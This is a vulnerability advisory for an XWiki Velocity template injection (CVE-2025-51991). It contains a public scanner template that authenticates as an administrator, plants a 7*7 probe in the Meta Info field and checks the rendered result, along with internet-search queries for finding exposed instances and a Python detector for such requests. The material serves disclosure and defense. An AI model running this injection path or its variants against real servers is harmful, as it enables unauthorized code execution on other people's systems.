CVE-2025-51991: XWiki <= 17.3.0 - Server-Side Template Injection (SSTI)

Date: 2025-11-14 | Affected software: XWiki | PoC: public

Vulnerability description

XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic.

PoC code [public]

id: CVE-2025-51991

info:
  name: XWiki <= 17.3.0 - Server-Side Template Injection (SSTI)
  author: 0x_Akoko
  severity: critical
  description: |
    XWiki <= 17.3.0 contains a server-side template injection caused by improper validation of Apache Velocity template code in the Administration interface HTTP Meta Info field, letting authenticated administrators execute arbitrary template logic.
  impact: |
    Authenticated administrators can execute arbitrary template logic, potentially exposing internal server information or enabling remote code execution.
  remediation: |
    Update to a version later than 17.3.0 or the latest available version.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51991
    - https://github.com/malcxlmj/cve-writeups/blob/main/CVE-2025-51991.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2025-51991
    epss-score: 0.03554
    epss-percentile: 0.8721
    cwe-id: CWE-94
  metadata:
    max-request: 5
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: http.html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: xwiki,ssti,template-injection,authenticated

flow: http(1) && http(2) && http(3) && http(4) && http(5)

http:
  - raw:
      - |
        GET /bin/login/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: login_token
        internal: true
        regex:
          - 'name="form_token" value="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/loginsubmit/XWiki/XWikiLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xredirect=&form_token={{login_token}}&j_username={{username}}&j_password={{password}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(location, '/bin/view/Main/')
        condition: and
        internal: true

  - raw:
      - |
        GET /bin/admin/XWiki/XWikiPreferences?editor=globaladmin&section=Presentation HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: form_token
        internal: true
        regex:
          - 'data-xwiki-form-token="([^"]+)"'
        group: 1

  - raw:
      - |
        POST /bin/saveandcontinue/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        XWiki.XWikiPreferences_0_showannotations=&XWiki.XWikiPreferences_0_showcomments=&XWiki.XWikiPreferences_0_showattachments=&XWiki.XWikiPreferences_0_showhistory=&XWiki.XWikiPreferences_0_showinformation=&XWiki.XWikiPreferences_0_title=&XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D7%2A7%29%24x&XWiki.XWikiPreferences_0_webcopyright=&XWiki.XWikiPreferences_0_version=&form_token={{form_token}}&xcontinue=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&xredirect=%2Fbin%2Fadmin%2FXWiki%2FXWikiPreferences%3Feditor%3Dglobaladmin%26section%3DPresentation&classname=XWiki.XWikiPreferences&formactionsac=Save

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
        internal: true

  - raw:
      - |
        GET /bin/view/XWiki/XWikiPreferences HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("XWikiPreferences\"[^>]*>\\s*49\\s*<", body)'
        condition: and
# digest: 4a0a00473045022079f39b11a7ff2360ac9569f483959d097d41c12b8cde917e6baed1d57e41452f022100b96ae10ef4c8012431c9eeb6f912abbdd04507b45ca3785b0a0a6db4c9075f79:922c64590222798bb761d5b6d8e72950
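A defender-side check, added here as an example and not part of the published template or of XWiki's own code: it flags Velocity syntax in the HTTP Meta Info field of a captured preferences save request (the field name and save path are the ones used in the template above) and tells whether a stored snippet was evaluated by the server rather than echoed. It assumes a reverse proxy or WAF that logs POST bodies; the sample requests are constructed.

```python
import re
from urllib.parse import parse_qs

META_FIELD = "XWiki.XWikiPreferences_0_meta"
SAVE_PATH = "/bin/saveandcontinue/XWiki/XWikiPreferences"

# Velocity directives and references; a static HTML <meta> snippet needs neither.
VELOCITY_SYNTAX = re.compile(
    r"#\s*\{?(?:set|if|else|elseif|foreach|evaluate|macro|parse|include|define)\b"
    r"|\$!?\{?[A-Za-z_][\w.]*",
    re.IGNORECASE,
)


def velocity_findings(meta_value: str) -> list:
    """Return every Velocity directive or reference found in a meta value."""
    return [m.group(0) for m in VELOCITY_SYNTAX.finditer(meta_value)]


def check_save_request(path: str, body: str) -> list:
    """Inspect one captured form POST (assumed to come from a proxy that logs bodies).
    Returns the Velocity findings in the meta field, or [] when the request is not
    a preferences save or the field is clean."""
    if path != SAVE_PATH:
        return []
    fields = parse_qs(body, keep_blank_values=True)
    meta = fields.get(META_FIELD, [""])[0]  # parse_qs URL-decodes the value
    return velocity_findings(meta)


def evaluated_by_server(stored_meta: str, rendered_html: str) -> bool:
    """True when the stored snippet was executed rather than echoed verbatim:
    at least one piece of its Velocity syntax is missing from the rendered page."""
    findings = velocity_findings(stored_meta)
    return bool(findings) and not all(f in rendered_html for f in findings)


# Constructed sample requests; the encoded meta value in the second one is the
# same 7*7 probe the template above submits.
SAMPLE_REQUESTS = [
    (SAVE_PATH, "XWiki.XWikiPreferences_0_meta=%3Cmeta+name%3D%22robots%22"
                "+content%3D%22noindex%22%3E&form_token=abc"),
    (SAVE_PATH, "XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D7%2A7%29%24x&form_token=abc"),
    ("/bin/view/Main/WebHome", "XWiki.XWikiPreferences_0_meta=%23set%28%24x%3D1%29"),
]

if __name__ == "__main__":
    for path, body in SAMPLE_REQUESTS:
        print(path, check_save_request(path, body))
```

A single `$` followed by a digit (a price in a meta description, say) is not flagged, but any `$name` reference is, so treat hits as something to review rather than as proof of exploitation.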
